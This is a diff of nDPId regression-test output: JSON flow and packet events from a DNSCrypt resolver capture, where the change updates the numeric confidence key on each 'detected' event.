AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348756,"pkt":"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"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":428,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348756} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":428,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwiUAub0RJcIKAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348756,"pkt":"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"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwiggAL0RAOwKAAABuf2aQrwfEPcGBB7tY0gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":431,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348756} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":431,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwigAub0RJb8KAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwikgAL0RAOsKAAABuf2aQpZSEPcGBES4Y0oBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":433,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348756} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":433,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwikAub0RJb4KAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":2,"flow_last_seen":946739348800,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739348800,"pkt":"ZmZmZmZmRERERERECABFAADTW7dAADkR0Ga5\/ZpCCgAAARD3svcAv+AkY0uBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPzOPvxAqRNc7Q72GZx6clSW\/rILjCJS5AVCUtIfh\/knKqjuiGnU\/ySlMpkdSKAUBEzuxnQcAR\/n3q9w6kY3ZQBbAAtR8Cvhyf4swkJ5CXEM5Flzvf2K4fhPC+UgsGecNlsAC1HwK+HJAAAAAV9TdNFfVMZR"} 
@@ -880,26 +880,26 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739348805,"pkt":"ZmZmZmZmRERERERECABFAADTW7tAADkR0GK5\/ZpCCgAAARD3vB8Av9b\/Y0iBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPzOPvxAqRNc7Q72GZx6clSW\/rILjCJS5AVCUtIfh\/knKqjuiGnU\/ySlMpkdSKAUBEzuxnQcAR\/n3q9w6kY3ZQBbAAtR8Cvhyf4swkJ5CXEM5Flzvf2K4fhPC+UgsGecNlsAC1HwK+HJAAAAAV9TdNFfVMZR"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAIclaRAAL0RCvwKAAABjgTMb8m\/AbsCCB1KEX8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
